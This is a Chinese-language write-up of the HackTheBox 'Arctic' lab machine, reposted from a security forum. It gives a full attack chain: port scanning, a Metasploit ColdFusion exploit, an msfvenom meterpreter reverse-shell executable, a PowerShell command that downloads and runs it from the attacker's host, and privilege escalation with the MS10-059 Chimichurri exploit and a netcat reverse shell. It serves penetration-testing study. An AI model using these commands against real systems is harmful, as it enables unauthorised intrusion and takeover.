HTB靶場記錄之Arctic

本文是 i 春秋論壇作家「皮卡皮卡丘」表哥分享的技術文章，旨在為大家提供更多的學習方法與技能技巧，文章僅供學習參考。

相關文章>>

HTB靶場記錄之OpenAdmin

HTB靶場記錄之Popcorn

HTB靶場記錄之Europa

HTB靶場記錄之Cronos

本文是 i 春秋論壇作家「皮卡皮卡丘」表哥分享的技術文章，公衆号旨在為大家提供更多的學習方法與技能技巧，文章僅供學習參考。

HTB是一個靶機平台，裡面包含多種系統類型的靶機，并且很多靶機非常貼近實戰情景，是一個學習滲透測試不錯的靶場。

 1、靶機介紹

這次的靶機是windows靶機。建議用MSF做前期的getshell,這樣友善點。提權部分可能要手工編造PowerShell腳本傳檔案。

2、資訊收集

還是先用nmap進行一波端口探測，終于遇到一個沒80端口的了。

指令：nmap -A -sS -sV -v -p- 10.10.10.11

這裡隻能慢慢一個一個查，8500端口是唯一能正常通路的。

 那麼逐一通路兩個檔案夾裡面的内容一直到/CFIDE/administrator發現一個正常的Web登入頁面。

3、利用MSF get shell

遇事不決問MSF，然而一搜就發現太多payload了。。。

那隻能先進入MSF，找到一個掃描版本的payload。

這樣可以縮短查找範圍：

那麼使用該payload，設定好參數以後run，成功得知版本為8。

縮短範圍後，可以确定我們這次要用的payload是這個MSF自帶的。

然而裂開了，第一次卡BUG卡在設定payload好久。請教一下大佬，結果要設定延遲時間。我們去到payload那裡改，把5改為30。

此時重新開機波MSF使用

exploit/windows/http/coldfusion_fckeditorpayload。設定波參數成功得到一個普通使用者shell。

指令：set RHOSTS 10.10.10.11

SetRPORT 8500

SetLHOST 10.10.14.5

SetLPORT 5555

run

順便去到tolis/desktop得到flag。

4、添加shell

雖然我們拿到了shell,但提權對于我這種菜雞來說還是太難了。需要用到MSF的local_exploit_suggester。我們需要在MSF下再拿一個shell運作它。是以需要先制作一個小exe的馬

指令:msfVENOM

-pwindows/x64/meterpreter_reverse_tcp LHOST=10.10.14.5 LPORT=5555 -f exe>shell1.exe

然後打開我們的python3共享模式：

指令: python -m http.server 8082 此時在我們的靶機上要把exe給下載下傳過來。

研究了一下傳輸指令，需要用到PowerShell，去網上找了個模闆套了一下變成以下指令，成功把shell1.exe傳過來了。

指令: PowerShell (new-object Net.WebClient).DownloadFile('

http://10.10.14.5:8082/shell1.exe','c:\Users\tolis\Desktop\shell1.exe')

同時啟動MSF，用exploit/multi/handler payload,注意這裡一定要設定payload為

windows/x64/meterpreter_reverse_tcp。這裡在靶機上運作shell1.exe成功進入meterpreter。這時候我們同時有2個shell了。

5、利用輔助得到可利用的漏洞資訊

關于windows靶機提權有2種方法第一種是利用MSF獲得shell以後要使用到自帶神器local_exploit_suggester。可以看到有3個可以利用的。據大佬說這3個都可以利用。

指令:ctrl+z Y 退出meterpreter回到background界面

usepost/multi/recon/local_exploit_suggester

setsession n

另外一種方法是有一個用神器windowexploitsuggester，比MSF掃出的多點。最後決定用MS10-059。

經過逐一篩選可确定是MS10-059有個payload在github頁面

https://github.com/Re4son/Chimichurri

6、提權

大佬随便用MSF選那3個檢測的洞就能搞定。而我各種線程注入，鑽來鑽去都失敗了。重新開機靶機n次都不行。

隻能用powershell腳本把我的Chimichurri.exe下載下傳傳過來。然後再慢慢弄。

這裡示範如果我沒用MSF添加shell時，如何友善傳檔案。

這是最終版powershell腳本，Windows上echo跟Linux echo一樣同樣可以寫入檔案裡面。

這裡解析一波，如果我說的不對請多多包容。

首先我們要建立一個WebClient對象(New-Object System.Net.WebClient)然後指派給變量$webclient。

接着定義好我們要用python共享的端口和檔案(注意一定要對大小寫特别敏感,GitHub上下載下傳下來的是Chimichurri.exe,而我這裡寫的是chimichurri.exe,我還疑惑了好久到底是哪出問題了)。然後指定接收後的檔案改名為exploit.exe。而後面的WebClient.DownloadFile就是把将具有指定URL的檔案下載下傳到靶機上。最後開始用powershell.exe執行。這是菜鳥腳本而已。實在不行就在MSF添加shell以後上傳也行。

然後在靶機上執行，記得提前開啟波Nc反彈。

成功變為最進階權限。